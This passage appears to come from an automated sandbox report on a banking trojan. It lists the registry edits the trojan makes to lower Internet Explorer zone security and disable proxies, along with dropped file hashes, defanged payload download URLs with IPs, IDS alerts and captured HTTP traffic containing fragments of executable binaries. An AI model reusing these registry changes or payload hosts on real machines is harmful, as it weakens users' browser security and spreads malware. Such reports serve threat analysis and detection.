The Trojan-Banker modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Config.exe:1952 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 C3 05 6D DF 96 B5 E2 5C 60 89 A1 86 EB FC BD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\gssoft\gswb]
"ServicePath" = "%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\gssoft\gswb]
"ServiceName" = "0a5b509cdd3b6170bcbbd2667002b7e7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\gssoft\gswb]
"ServiceExe" = "3026bf8d9e37080c8abcaaf6df47dbf3"

The process Power.exe:2536 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 04 04 29 6E B2 32 70 7D 48 3E 3C 1E 72 8C E4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Power.exe:1772 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 60 CD 44 DC 1E CA FA A5 57 C7 D4 65 AB F0 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process WJSpeed.exe:2880 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 77 0E 40 DE 2C 35 5E 88 76 E4 E7 3F 35 A9 D4"

The process WJSpeed.exe:2788 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D6 85 9A DB 48 DC 04 59 35 19 DF 20 CC 8D E6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Banker modifies IE security-zone settings so that all local web-nodes without dots that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process WJSpeed.exe:3020 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B DF 7D 30 97 30 6A 8C 2C 1B 5A CD 82 56 E6 B2"

The process ApkReg.exe:2652 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 96 32 84 DF C7 DE D3 1A 7D 95 55 41 77 06 6A"

[HKCR\.apk]
"(Default)" = "GSApkFile"

[HKCR\GSApkFile\shell\open\command]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe install %1"

[HKCR\GSApkFile\DefaultIcon]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe"

[HKCR\GSApkFile]
"(Default)" = "GSApkFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.apk]
"Progid" = "GSApkFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.apk\UserChoice]
"Progid" = "GSApkFile"

The process wjplay.exe:1456 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 51 13 75 7E EC 4D 46 F9 F4 3A 7F FB D6 81 64"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE security-zone settings so that all local web-nodes without dots that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseF.tmp\System.dll
4ef209b45569e43632fc12df01c53305 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseF.tmp\metadl.dll
0a3f484a26c2800cba1cd835d54b6ade c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseF.tmp\setup_qd304.exe
bed1cd437a6664a063858cb87a992227 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk12.tmp\System.dll
342516a9a38becea86fc40df0c850a6d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\axuls[1].exe
4bb48f7e0eff2cd69c26743b18cd583a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\axult[1].exe
39bb33f853ea6ff05dd9fef71af31820 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_qd304[1].exe
8f8388ff0f9508a4967de0e33ad72393 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_open_341[1].exe
32c86e6a9e00d52b0547aa3b4adb6437 c:\Program Files\gssoft\gswb\2.8.1.1120\ApkReg.exe
46a902ffbdad4277fa543e2931ce4eaf c:\Program Files\gssoft\gswb\2.8.1.1120\Config.exe
aeb26abf54b585561612e35ffde5fa64 c:\Program Files\gssoft\gswb\2.8.1.1120\Expand.dll
23cc67aac8a96fc87a8117135d40e3f4 c:\Program Files\gssoft\gswb\2.8.1.1120\ImeReg32.exe
7ac234234b0d66b319f603d2f5c3174c c:\Program Files\gssoft\gswb\2.8.1.1120\ImeReg64.exe
3d35a6947229635b0b843a3144b17a8f c:\Program Files\gssoft\gswb\2.8.1.1120\ImeUtil.exe
7a67b3f770826f2cf85d5e35af576ab5 c:\Program Files\gssoft\gswb\2.8.1.1120\MBManager.exe
6c876ab526c7201271fe84501cfb82b0 c:\Program Files\gssoft\gswb\2.8.1.1120\Mutual.exe
e8dd3be6a4c0eb5d57a772e85ecaca5a c:\Program Files\gssoft\gswb\2.8.1.1120\Power.exe
c81281f0b1d528a75ec939d74deacd10 c:\Program Files\gssoft\gswb\2.8.1.1120\Service.dll
d9e484ea02bc94ceeaad9332f4b299c5 c:\Program Files\gssoft\gswb\2.8.1.1120\SkinReg.exe
6c69f7343da82f96466f4eecddd9429d c:\Program Files\gssoft\gswb\2.8.1.1120\Statistics.dll
afa98c7b8342973574e42ae3545b6af9 c:\Program Files\gssoft\gswb\2.8.1.1120\Tool.exe
bdfe1cc3f07c227762d788fe061bb6bf c:\Program Files\gssoft\gswb\2.8.1.1120\WDJDriverPreinstaller.exe
7f42436f8f9710208f549b6f831fa1b5 c:\Program Files\gssoft\gswb\2.8.1.1120\WbUpd.exe
f47599011ca588a4c886b27a46684d9b c:\Program Files\gssoft\gswb\2.8.1.1120\WdjEngine.dll
2b32ae66afb22232832d09ae02564639 c:\Program Files\gssoft\gswb\2.8.1.1120\WdjRelated.dll
89d69647aeda90b26c9c07d93f50fd5e c:\Program Files\gssoft\gswb\2.8.1.1120\Wizard.exe
8530435a57f909880374c09775c2e6a6 c:\Program Files\gssoft\gswb\2.8.1.1120\aapt.exe
6b73135e96e9066f948535f0acd65a15 c:\Program Files\gssoft\gswb\2.8.1.1120\gswb32.ime
e59def245fe8e767c2e51c5e73a54ce1 c:\Program Files\gssoft\gswb\2.8.1.1120\gswb64.ime
c7cba18c39940d5a236f4cf8c437e0bb c:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
925f6d296246408bcadbffaa1ee91b8d c:\Program Files\gssoft\gswb\2.8.1.1120\wdj_connection_wrapper.dll
342516a9a38becea86fc40df0c850a6d c:\Program Files\vsgrtaho\axuls.exe
4bb48f7e0eff2cd69c26743b18cd583a c:\Program Files\vsgrtaho\axult.exe
18507ce9bd6114ed575a40b8fc55839b c:\Program Files\vsgrtaho\d3dim.dll
7c8db6e5acc97e8f8064a2f5c6244c67 c:\Program Files\vsgrtaho\dciman32.dll
3da9208f5816252fedd948433e4b123d c:\Program Files\vsgrtaho\devmgr.dll
88441504bc80f3f8f8469e01e860f4e1 c:\Program Files\vsgrtaho\dmocx.dll
39bb33f853ea6ff05dd9fef71af31820 c:\Program Files\vsgrtaho\hzsoft\setup_qd304.exe
35c4650ee5f1c353b8bbdcd4c1a2abef c:\Program Files\vsgrtaho\ialmuDAN.dll
8f8388ff0f9508a4967de0e33ad72393 c:\Program Files\vsgrtaho\setup_open_341.exe
49e5fb3a44d171393fa72e5843c659bb c:\Program Files\vsgrtaho\vsgrtaho.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 67196 67584 4.54827 5c4d5ace2672731f58b9d31b4d21f13f
.rdata 73728 6101 6144 3.82125 019ad0f666e2ac17292e5d20e1bdf6c3
.data 81920 49140 512 2.45613 2821477811bfd11f4acd2c1da2aba6da
.CRT 131072 16 512 0.147711 324bcdad78da9eab2e1651550291e550
.rsrc 135168 15968 16384 2.48941 6de80162196c057ba9b8df5bec2720bc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10
805336f522845a87a6d31561b677a73d
98bd7ee8466484a43feafde8e5bd6c88
40794fca5f8bbb0c3d14f2776644f38b
f5954d52890b4483c7c48680951ac196
f8d68e474374caf20da173e457cbfce3
5bd62a5240b55b1989fb8fff09a28747
e8cbd7071ca3c2ab7c3e94510e096bd5
f35a332dcc6d77b96c2b505f16456e1b
cf08ae4c78e3493017a207ae7a352a1c
6b1c701c5e3c6c2caa5cc171ced8f7f1

URLs

URL IP
hxxp://adsvc2.9365.info/count/softcount/?pwb 211.101.12.49
hxxp://c.split.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic
hxxp://c.split.cnzz.com/core.php?web_id=4327411&show=pic&t=z
hxxp://z6.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=51257339-1399458444-&showp=1276x846&st=0&sin=&t=&rnd=680456921
hxxp://icon.cnzz.com/img/pic.gif 42.156.162.7
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=557467190
hxxp://adsvc2.9365.info/ad/softad/popup.htm 211.101.12.49
hxxp://pcookie.split.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc
hxxp://adsvc2.9365.info/ad/softad/pwb.htm 211.101.12.49
hxxp://adsvc2.9365.info/dls/axuls.exe 211.101.12.49
hxxp://cbjs.e.shifen.com/js/s.js
hxxp://adsvc2.9365.info/dls/axult.exe 211.101.12.49
hxxp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
hxxp://download.grandcloud.cn/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe 223.202.24.13
hxxp://08911.xdwscache.glb0.lxdns.com/qdn/setup_qd304.exe
hxxp://download.wuji.com/wuji/open/setup_open_341.exe 222.186.60.26
hxxp://08911.xdwscache.glb0.lxdns.com/qdn/setup_qd304.gif
hxxp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
hxxp://download.grandcloud.cn/9291/15474/setup_2949-14598.exe 223.202.24.13
hxxp://tclick.wauee.net/link/140896/setup_2948-140896.exe
hxxp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe
hxxp://down.yinyue.fm/open/setup_2948-140896.exe 171.111.158.29
hxxp://down.guangsu.cn/qdn/setup_qd304.gif 222.84.167.30
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=557467190 42.120.219.171
hxxp://hzs2.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=51257339-1399458444-&showp=1276x846&st=0&sin=&t=&rnd=680456921 42.156.140.19
hxxp://cbjs.baidu.com/js/s.js 123.125.65.120
hxxp://pcookie.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc 42.120.219.171
hxxp://211.101.12.49/dls/axult.exe
hxxp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic 1.99.192.16
hxxp://down.guangsu.cn/qdn/setup_qd304.exe 222.84.167.30
hxxp://c.cnzz.com/core.php?web_id=4327411&show=pic&t=z 42.156.140.11
hxxp://211.101.12.49/dls/axuls.exe
hxxp://click.t3nlink.com/link/140896/setup_2948-140896.exe 61.147.97.228


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET /app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com


HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 07 May 2014 10:27:27 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=jvjwC0DkbHMCAcGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:27 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Te
ngine..Date: Wed, 07 May 2014 10:27:27 GMT..Content-Type: image/gif..C
ontent-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa A
DMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=jvjwC0DkbHMCA
cGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:27 GMT; path=/; domain=.cnzz
.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache.
.Pragma: no-cache..GIF89a.............!.......,...........L..;..


GET /stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=51257339-1399458444-&showp=1276x846&st=0&sin=&t=&rnd=680456921 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs2.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 07 May 2014 10:27:25 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..


GET /wuji/open/setup_open_341.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.wuji.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.5.10
Date: Wed, 07 May 2014 10:28:33 GMT
Content-Type: application/octet-stream
Content-Length: 1996944
Last-Modified: Fri, 25 Apr 2014 06:53:28 GMT
Connection: keep-alive
ETag: "535a0668-1e7890"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......@.......F.......s.......r.......[.......K.........Q.....w.......
B.......E.....Rich............................PE..L....z6S............
.........F...............0....@.................................b.....
@.................................\........0..t2...........^.......p..
.'...2..............................`...@............0................
...............text............................... ..`.rdata.......0..
....................@..@.data...dA....... ..................@....rsrc.
..t2...0...4..................@..@.reloc..bB...p...D..................
@..B..................................................................
......................................................................
......................................................................
......................................................................
..............................................@3C...m.......U..V....@3
C...m...E..t.V..o.......^]............................U..j.h."C.d.....
P..p...C.3..E.SVP.E.d......}..=..D.3..]..G<S..lcC..G.tcC..G..cC..G.
.cC..G..cC..G,.....G0.._4h.cC.P.G8...Kz...G8............F.j,.G|.......
................h.cC.P......z........Y,.......E....X..X.P.E....!...E..
jX........n.....;......................@........@........BT........@U.
.E....3...8.t.0.@A...u.3.8.u.R........h......n......E..E..;.t.P.g.....
3..u..G4.......Q....w8......E..U.;.t.P.Ks.....S.E.P.O.Q.E......]..

<<< skipped >>>

GET /qdn/setup_qd304.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.guangsu.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 06 May 2014 15:19:32 GMT
Content-Type: application/octet-stream
Last-Modified: Sat, 30 Nov 2013 07:58:50 GMT
Accept-Ranges: bytes
ETag: "0d9241a2edce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 203872
Age: 1
X-Via: 1.1 zjjhdx31:8104 (Cdn Cache Server V2.0), 1.1 fra77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
...........................Y........................................s.
.........xE...........................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@..@.data........
........r..............@....ndata.......@...........................rs
rc...xE.......F...v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.
P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......P
p@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

